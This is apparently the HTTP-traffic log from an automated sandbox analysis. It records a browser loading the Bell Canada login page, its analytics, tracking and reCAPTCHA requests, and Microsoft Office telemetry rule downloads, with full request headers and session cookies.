Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=48B034FA53CF9FD10A490D44%40AdobeOrg&d_nsid=0&ts=1730380327750 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479
Source: global trafficHTTP traffic detected: GET /dest5.html?d_nsid=0 HTTP/1.1Host: bellca.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479
Source: global trafficHTTP traffic detected: GET /i/14028/693653/c.json HTTP/1.1Host: collection.decibelinsight.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mybell.bell.caSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m2/bellcanada/mbox/json?mbox=target-global-mbox&mboxSession=e8acc2285415480dbbf54ad6f854a96e&mboxPC=&mboxPage=38354bc94d0a493099a306274bc21c84&mboxRid=37fe7f796df14429b4eff85641053e61&mboxVersion=1.8.2&mboxCount=1&mboxTime=1730365927825&mboxHost=mybell.bell.ca&mboxURL=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&mboxReferrer=&browserHeight=907&browserWidth=1263&browserTimeOffset=-240&screenHeight=1024&screenWidth=1280&colorDepth=24&devicePixelRatio=1&screenOrientation=landscape&webGLRenderer=ANGLE%20%28Google%2C%20Vulkan%201.3.0%20%28SwiftShader%20Device%20%28Subzero%29%20%280x0000C0DE%29%29%2C%20SwiftShader%20driver%29&lob=&dflob=&language=en&province=on&footprint=&PostalCode=&LoggedInStatus=false&epp_company_code=dock%20is%20not%20present%3Ai&profile.IspCheckAvail=false&mboxMCSDID=03870B84460DADFF-291E557ADEB59CD2&mboxMCGVID=26404690240998747124274156036452379072&mboxAAMB=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&mboxMCGLH=6 HTTP/1.1Host: somni.bell.caConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://mybell.bell.caSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; __cwaf=true; rxvt=1730382125270|1730380318420; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e62
Source: global trafficHTTP traffic detected: GET /getapploginpage HTTP/1.1Host: m.bell.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; __cwaf=true; rxvt=1730382125270|1730380318420; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; at_check=true; mbox=session#e8acc2285415480dbbf54ad6f854a96e#1730382188; _s=S6c9HjLG1CKQ24ifOYUX5B5hCZzHCSe7lfumMUowKETY2281c4GOWO2X5PlM16AY; AMCVS_48B034FA53CF9FD10A490D44%40AdobeOrg=1; AMCV_48B034FA53CF9FD10A490D44%40AdobeOrg=179643557%7CMCIDTS%7C20028%7CMCMID%7C26404690240998747124274156036452379072%7CMCAAMLH-1730985129%7C6%7CMCAAMB-1730985129%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /i/14028/693653/di.js HTTP/1.1Host: cdn.decibelinsight.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /9hb8rBafRwb?_p=c11334dc9a0760eee0188ee3efb2 HTTP/1.1Host: bell.app.linkConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /branch-latest.min.js HTTP/1.1Host: cdn.branch.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /i/14028/693653/c.json HTTP/1.1Host: collection.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /m2/bellcanada/mbox/json?mbox=target-global-mbox&mboxSession=e8acc2285415480dbbf54ad6f854a96e&mboxPC=&mboxPage=38354bc94d0a493099a306274bc21c84&mboxRid=37fe7f796df14429b4eff85641053e61&mboxVersion=1.8.2&mboxCount=1&mboxTime=1730365927825&mboxHost=mybell.bell.ca&mboxURL=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&mboxReferrer=&browserHeight=907&browserWidth=1263&browserTimeOffset=-240&screenHeight=1024&screenWidth=1280&colorDepth=24&devicePixelRatio=1&screenOrientation=landscape&webGLRenderer=ANGLE%20%28Google%2C%20Vulkan%201.3.0%20%28SwiftShader%20Device%20%28Subzero%29%20%280x0000C0DE%29%29%2C%20SwiftShader%20driver%29&lob=&dflob=&language=en&province=on&footprint=&PostalCode=&LoggedInStatus=false&epp_company_code=dock%20is%20not%20present%3Ai&profile.IspCheckAvail=false&mboxMCSDID=03870B84460DADFF-291E557ADEB59CD2&mboxMCGVID=26404690240998747124274156036452379072&mboxAAMB=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&mboxMCGLH=6 HTTP/1.1Host: somni.bell.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; rxVisitor=17303803184158NV4F74O1KFTJ2EO5K4UAGQSTA0OEH7F; dtPC=8$580318412_852h1vOSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0e0; dtSa=-; __cwaf=true; rxvt=1730382125270|1730380318420; TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/anchor?ar=1&k=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP&co=aHR0cHM6Ly9teWJlbGwuYmVsbC5jYTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=h2gb06tnckv8 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=adobe_dmp&google_cm&gdpr=0&gdpr_consent=&google_hm=MjY1OTQyNTA5ODIxNzUwNzY3MTQyNTkzMTg3Njc3NDY3ODI0Nzk= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /i/14028/693653/di.js HTTP/1.1Host: cdn.decibelinsight.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: da_lid=-B7D567C29E92EA123347BB99E4B686613C|0|0|0; da_sid=84E654F18AD2AE89A616AA13A6B4CC6A8F.1|3|0|3
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=aam&gdpr=0&gdpr_consent=&domain=mybell.bell.ca&ttd_tpi=1 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=adobe_dmp&google_cm=&gdpr=0&gdpr_consent=&google_hm=MjY1OTQyNTA5ODIxNzUwNzY3MTQyNTkzMTg3Njc3NDY3ODI0Nzk=&google_tc= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /ibs:dpid=411&dpuuid=ZyOCLgAAAGAnoQN6 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=26594250982175076714259318767746782479; dextp=771-1-1730380332611|903-1-1730380332941|1957-1-1730380333516|22052-1-1730380333930
Source: global trafficHTTP traffic detected: GET /_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0 HTTP/1.1Host: app.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://mybell.bell.ca/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _s=bSIHRGqn9rL3nJ2hRxT4ssO5k%2FFjfBiEcV6oWbASilINqVOmeni4p8hvKqSbWcOb
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=aam&gdpr=0&gdpr_consent=&domain=mybell.bell.ca&ttd_tpi=1 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bellca.demdex.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=d5095770-96af-43e0-8b13-9a680ab5a9e6; TDCPM=CAEYBSgCMgsItIWf6ovuvD0QBTgB
Source: global trafficHTTP traffic detected: GET /branch-latest.min.js HTTP/1.1Host: cdn.branch.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
